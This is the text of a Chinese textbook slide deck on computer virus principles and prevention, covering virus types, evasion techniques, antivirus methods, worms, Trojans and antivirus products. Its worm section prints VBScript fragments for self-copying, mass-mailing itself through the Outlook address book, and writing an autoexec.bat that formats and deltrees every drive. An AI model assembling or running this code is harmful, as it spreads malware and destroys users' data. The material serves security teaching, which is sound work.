计算机病毒原理及防治.ppt

第12章 计算机病毒原理及防治,12.1 计算机病毒的概述 12.2 计算机病毒制作技术 12.3 反计算机病毒技术 12.4 蠕虫病毒分析 12.5 黑客程序与特洛伊木马 12.6 反病毒软件简介,12.1 计算机病毒的概述,“计算机病毒是指编制或者在计算机程序中破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码”。这个定义明确表明了计算机病毒就是具有破坏性的计算机程序。 12.1.2 计算机病毒的特征 （1）破坏性。 （2）隐蔽性。 （3）传染性。 （4）潜伏性。 （5）可触发性。 （6）不可预见性。,12.1.3 计算机病毒的产生原因 （1）软件产品的脆弱性是产生计算机病毒根本的技术原因。 （2）社会因素是产生计算机病毒的土壤。 12.1.4 计算机病毒的传播途径 计算机病毒主要是通过复制文件、发送文件、运行程序等操作传播的。通常有以下几种传播途径： 1移动存储设备。包括软盘、硬盘、移动硬盘、光盘、磁带等。 2网络。由于网络覆盖面广、速度快，为病毒的快速传播创造了条件。目前大多数新式病毒都是通过网络进行传播的，破坏性很大。,12.1.5 计算机病毒的分类 引导型病毒：主要通过感染软盘、硬盘上的引导扇区或改写磁盘分区表（FAT）来感染系统，引导型病毒是一种开机即可启动的病毒，优先于操作系统而存在。该病毒几乎常驻内存，激活时即可发作，破坏性大，早期的计算机病毒大多数属于这类病毒。 文件型病毒：它主要是以感染COM、EXE等可执行文件为主，被感染的可执行文件在执行的同时，病毒被加载并向其它正常的可执行文件传染。病毒以这些可执行文件为载体，当运行可执行文件时就可以激活病毒。 宏病毒：宏病毒是一种寄存于文档或模板的宏中的计算机病毒，是利用宏语言编写的。,蠕虫病毒：蠕虫病毒与一般的计算机病毒不同，蠕虫病毒不需要将其自身附着到宿主程序上。蠕虫病毒主要通过网络传播，具有极强的自我复制能力、传播性和破坏性。 特洛伊木马型病毒：特洛伊木马型病毒实际上就是黑客程序。黑客程序一般不对计算机系统进行直接破坏，而是通过网络窃取国家、部门或个人宝贵的秘密信息，占用其它计算机系统资源等现象。 网页病毒：网页病毒一般也是使用脚本语言将有害代码直接写在网页上，当浏览网页时会立即破坏本地计算机系统，轻者修改或锁定主页，重者格式化硬盘，使你防不胜防。 混合型病毒：兼有上述计算机病毒特点的病毒统称为混合型病毒，所以它的破坏性更大，传染的机会也更多，杀毒也更加困难。,12.1.6 计算机病毒的表现现象 1平时运行正常的计算机突然经常性无缘无故地死机。 2运行速度明显变慢。 3打印和通讯发生异常。 4系统文件的时间、日期、大小发生变化。 5磁盘空间迅速减少。 6收到陌生人发来的电子邮件。 8硬盘灯不断闪烁。 9计算机不识别硬盘。 10操作系统无法正常启动。 11部分文档丢失或被破坏。 12网络瘫痪。,12.1.7 计算机病毒程序一般构成 1安装模块 病毒程序必须通过自身的程序实现自启动并安装到计算机系统中，不同类型的病毒程序会使用不同的安装方法。 2传染模块 传染模块包括三部分内容： （1）传染控制部分。 （2）传染判断部分。 （3）传染操作部分。 3破坏模块 破坏模块包括两部分：一是激发控制，当病毒满足一个条件,病毒就发作；另一个就是破坏操作，不同病毒有不同的操作方法，典型的恶性病毒是疯狂拷贝、删除文件等。,12.2 计算机病毒制作技术,1脚本语言与ActiveX技术 新型计算机病毒却利用Java Script或VBScrip脚本语言和ActiveX技术直接将病毒写到网页上，完全不需要宿主程序。脚本语言和ActiveX的执行方式是把程序代码写在网页上，当连接到这个网站时，浏览器就会利用本地的计算机系统资源自动执行这些程序代码，使用者就会在毫无察觉的情况下，执行了一些来路不明的程序，遭到病毒的攻击。,2采用自加密技术 计算机病毒采用自加密技术就是为了防止被计算机病毒检测程序扫描出来，并被轻易地反汇编。计算机病毒使用了加密技术后，对分析和破译计算机病毒的代码及清除计算机病毒等工作都增加了很多困难。 3采用变形技术 当某些计算机病毒编制者通过修改某种已知计算机病毒的代码，使其能够躲过现有计算机病毒检测程序时，称这种新出现的计算机病毒是原来被修改计算机病毒的变形。当这种变形了的计算机病毒继承了原父本计算机病毒的主要特征时，就被称为是其父本计算机病毒的一个变种。,4采用特殊的隐形技术 当计算机病毒采用特殊的隐形技术后，可以在计算机病毒进入内存后，使计算机用户几乎感觉不到它的存在。 对付隐形计算机病毒最好的办法就是在未受计算机病毒感染的环境下去观察它。 5对抗计算机病毒防范系统 计算机病毒采用对抗计算机病毒防范系统技术时，当发现磁盘上有某些著名的计算机病毒杀毒软件或在文件中查找到出版这些软件的公司名时，就会删除这些杀毒软件或文件，造成杀毒软件失效，甚至引起计算机系统崩溃。,6反跟踪技术 计算机病毒采用反跟踪措施的目的是要提高计算机病毒程序的防破译能力和伪装能力。常规程序使用的反跟踪技术在计算机病毒程序中都可以利用。 7中断与计算机病毒 中断是CPU处理外部突发事件的一个重要技术。它能使CPU在运行过程中对外部事件发出的中断请求及时地进行处理，处理完成后又立即返回断点，继续进行CPU原来的工作。但另一方面，病毒设计者则会篡改中断功能为达到传染、激发和破坏等目的。如INT 13H是磁盘输入输出中断，引导型病毒就是用它来传染病毒和格式化磁盘的。,12.3 反计算机病毒技术,1实时反病毒技术 实时反病毒是对任何程序在调用之前都被先过滤一遍，一有病毒侵入，它就报警，并自动杀毒，将病毒拒之门外，做到防患于未然。实时反病毒就是要解决用户对病毒的“未知性”问题。而这个问题是计算机反病毒技术发展至今一直没有得到很好解决的问题。 2病毒防火墙 病毒防火墙是从近几年颇为流行的信息安全防火墙中延伸出来的一种新概念，其宗旨就是对系统实施实时监控，对流入、流出系统的数据中可能含有的病毒代码进行过滤。,3VxD机制 反病毒软件利用VxD程序具有比其它类型应用程序更高的优先级，而且更靠近系统底层资源这一优势使反病毒软件才有可能全面、彻底地控制系统资源，并在病毒入侵时及时杀毒。 4 虚拟机技术 虚拟机技术具体的做法是：用程序代码虚拟一个CPU，同样也虚拟CPU的各个寄存器，硬件端口，用调试程序调入被调的“样本”，将每一个语句放到虚拟环境中执行，这样我们就可以通过内存和寄存器以及端口的变化来了解程序的执行情况。这样的一个虚拟环境就是一个虚拟机。将病毒放到虚拟机中执行，则病毒的传染和破坏等动作一定会被反映出来。理想情况下未知病毒的查出概率将是100。,5主动内核技术 由于操作系统和网络协议等自身不完善性和缺陷，使计算机病毒有机可乘。主动内核技术是从操作系统内核这一深度，主动给操作系统和网络系统打了一个个“补丁”，这些补丁将从安全的角度对系统或网络进行管理和检查，对系统的漏洞进行修补，任何文件在进入系统之前，作为主动内核的反病毒模块都将首先使用各种手段对文件进行检测处理。 6启发扫描的反病毒技术 一个运用启发式扫描技术的病毒检测软件，实际上就是以特定方式实现对有关指令序列的反编译，逐步理解和确定其蕴藏的真正动机。,7邮件病毒防杀技术 邮件病毒防杀技术是基于网络环境的嵌入式查杀病毒技术，它采用智能邮件客户端代理监控iSMCP（Smart Mail Client Proxy）技术。目前 iSMCP 技术支持广泛流行的POP3协议，支持多种流行的邮件客户端，比如 Outlook Express, FoxMail , Netscape 等，并且能同时代理监控多个邮件客户端同时收取邮件；具有完善的邮件解码技术，能对MIME/UUEncode 类型的邮件的各个部分（如附件文件）进行病毒扫描，清除病毒后能将无毒的邮件数据重新编码，传送给邮件客户端，并且能够更改主题、添加查毒报告附件；同时具有完善的网络监控功能，它能在邮件到达邮件客户端之前就进行拦截，让病毒无机可乘；具备垃圾邮件处理功能，自动过滤垃圾邮件，有效避免网络堵塞。,12.4 蠕虫病毒分析,12.4.1 蠕虫病毒特征 蠕虫病毒有很强的自我复制能力、很强的传播性、潜伏性 、特定的触发性、很大的破坏性。与其它病毒不同的是蠕虫不需要将其自身附着到宿主程序上。这主要是由于蠕虫病毒大都使用脚本语言编写，并利用了视窗系统的开放性特点，特别是COM到COM+的组件编程思路及ActiveX控件，使一个程序能调用功能更大的组件来完成病毒功能。,1蠕虫病毒的自我复制能力 Set objFs=CreateObject （“Scripting.FileSystemObject”） objFs.CreateTextFile （“C:virus.txt”，1） 如果我们把这两句话保存成为.vbs的VB脚本文件，点击鼠标就会在C盘中创建一个TXT文件了。如果我们把第二句改为： objFs.GetFile（WScript.ScriptFullName）.Copy （“C：Virus.vbs”） 该句前面是打开这个脚本文件，WScript.ScriptFullName指明是这个程序本身，是一个完整的路径文件名。GetFile函数获得这个文件，Copy函数将这个文件复制到C盘根目录下Virus.vbs文件。这么简单的两句就实现了自我复制的功能，已经具备病毒的基本特征，即自我复制能力。,2蠕虫病毒的传播性 其VB脚本代码如下： Set objOA=Wscript.CreateObject （“Outlook.Application”） Set objMapi=objOA.GetNameSpace （“MAPI”） For i=1 to objMapi.AddressLists.Count Set objAddList=objMapi.AddressLists （i） For j=1 To objAddList. AddressEntries.Count Set objMail=objOA.CreateItem （0） objMail.Recipients.Add （objAddList. AddressEntries （j） objMail.Subject=“你好!” objMail.Body=“这次给你的附件，是我的新文档！” objMail.Attachments.Add （“c:virus.vbs”）,objMail.Send Next Next Set objMapi=Nothing Set objOA=Nothing 3蠕虫病毒的潜伏性 dim wscr,rr set wscr=CreateObject （WScript.Shell） rr=wscr.RegRead （HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout） if （rr=1） then,wscr.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout”,0,“REG_DWORD” end if 4蠕虫病毒的触发性 x=time（） if x=xx.xx.xx then end if 5蠕虫病毒的破坏性 sub killc （） On Error Resume Next,dim fs,auto,disc,ds,ss,i,x,dir Set fs = CreateObject （“Scripting.FileSystemObject”） Set auto = fs.CreateTextFile （“c:Autoexec.bat”, True） auto.WriteLine （“echo off”） auto.WriteLine （“Smartdrv”） Set disc = fs.Drives For Each ds in disc If ds.DriveType = 2 Then ss = ss & ds.DriveLetter End if Next ss=LCase （StrReverse （Trim （ss）,For i=1 to Len （ss） x=Mid （ss,i,1） auto.WriteLine （“format/autotest/q/u “&x&”:”） next For i=1 to Len （ss） x=Mid （ss,i,1） auto.WriteLine （“deltree/y“&x&”:”） next auto.Close set dir=fs.GetFile （“:Autoexec.bat”） dir.attributes=dir.attributes+2 End sub,12.4.2 蠕虫病毒的防范 1把本地的带有破坏性的程序改名字，比如把改成。 2将Windows Script Host删除，就不用担心那些用VBS和JS编写的病毒了。方法是： （1）卸载Windows Scripting Host，简称WSH， （2）删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射。 （3）在Windows目录中，更改名称或者删除WScript.exe和JScript.exe文件。 3禁止“FileSystemObject”能控制VBS病毒传播。 4将浏览器安全级设为中等。 5安装实时病毒防火墙软件。,12.5 黑客程序与特洛伊木马,12.5.1 黑客攻击的常用手段 1包攻击。 黑客可利用一些工具产生畸形或碎片数据包，这些数据包不能被计算机正确合成，从而导致系统崩溃。 2服务型攻击。 这种攻击通常是黑客向计算机发送大量经过伪装的数据包，使计算机疲于响应这些经过伪装的不可到达客户的请求，从而使计算机不能响应正常的客户请求，或使计算机误以为访问的主机不可到达，从而达到切断正常连接的目的。,3缓冲区溢出攻击。 这种攻击是向操作系统或应用程序发送超长字符串，由于程序本身设计的漏洞，未能对其进行有效的检验，导致程序在缓冲区溢出时意外出错甚至退出，使黑客获得到系统管理员的权限。 4口令攻击。 这种攻击一般是依据一个包含常用单词的字典文件、程序进行大量的猜测，直到猜对口令并获得访问权为止。它通常使用蛮力攻击方式。 5IP 地址和端口扫描。 这种攻击就是要确定你的IP地址是否可以到达，运行哪种操作系统，运行哪些服务器程序，是否有后门存在。所以，当发现有人在扫描你的IP地址时，通常就意味着黑客攻击的开始。,6对各种软件漏洞的攻击。 每当新的操作系统、服务器程序等软件发布之后，各种漏洞就会被不断发现，这些漏洞常常被黑客利用，从而有可能导致计算机泄密、被非法使用，甚至崩溃。 7特洛伊木马攻击。 特洛伊木马是一种在你不知道的情况下自动执行恶意功能的程序，包括那些表面上执行某个合法功能，而背后却同时从事非法功能的程序。 12.5.2 特洛伊木马 特洛伊木马黑客程序一般有两个部分组成：一个是服务器程序，另一个是控制器程序。如果计算机安装了黑客服务器程序，那么，黑客就可以利用自身计算机控制器程序进入你的计算机中，通过达到控制和监视你的计算机的目的。,1特洛伊木马的启动方式 主要手法是加载到注册表的启动组中，也有些会捆绑到其它程序上附带地进入内存，如随着操作系统的启动而运行，捆绑的木马可以由黑客自己确定捆绑方式、捆绑位置、捆绑程序等。比如将木马捆绑到浏览器上，上网以后一打开浏览器，木马被附带启动了并自动打开木马端口，黑客就可以进入你的计算机了 2特洛伊木马端口 当木马在计算机中存在的时候，黑客就可以通过控制器程序命令木马做事情了。这些命令是在网络上传递的，需要遵守TCP/IP协议。TCP/IP协议规定计算机的端口有256*256=65536个，从0到65535号端口，木马打开一个或者几个端口，黑客所使用的控制器就可以进入木马打开的端口了。,3特洛伊木马的隐藏 木马为了更好地隐藏自己，通常会将自己的位置放在c:windows和c:windowssystem等系统目录中。因为windows的一些系统文件在这两个位置，如果误删了文件，计算机就可能崩溃，不得不重新安装系统。有的木马具有很强的潜伏能力，表面上的木马程序被发现并被删除已后，后备的木马在一定的条件下会恢复被删除的木马。 4特洛伊木马查杀 木马的查杀可以采用自动和手动两种方式。最简单的删除木马方法是安装杀毒软件，现在很多杀毒软件能删除网络最猖獗的木马。 由于杀毒软件的升级要慢于木马的出现，因此学会手工查杀也非常必要。,在删除木马之前，重要的一项工作是备份注册表，防止系统崩溃，备份你认为是木马的文件；如果不是木马就可以恢复，如果是木马就可以对木马进行分析。 （1）查看注册表 （2）检查启动组 （3）检查Win.ini、System.ini、Autoexec.bat等文件 （4）使用TCPVIEW、ATM软件,12.6 反病毒软件简介,1金山毒霸功能简介 双引擎杀毒设计。 功能完善的病毒隔离系统。 查毒种类多，查毒范围广，快速防治新病毒。 金山毒霸可检测包括 ZIP、CAB、RAR、ARJ 等多种流行压缩和自解压文件内的病毒。 具备病毒防火墙实时反病毒技术。 支持网络路径查杀病毒。 最新硬盘修复工具。 嵌入式查杀技术。,2KV3000功能简介 KV3000可以实时监视邮件传送过程中发现的病毒、黑客程序等。 KV3000可以实时监视互连网上的恶意网页，并可以实时清除。 KV3000增强硬盘修复功能，。 KV3000对用户上网浏览而造成的IE的设置被非授权修改等有非常有效的清除功能。 KV3000可以搜寻和清除目前流行国际国内的数以万计的各种形式的病毒。 KV3000可以识别大多数的未知病毒。 KV3000可以识别流行的多种压缩软件。,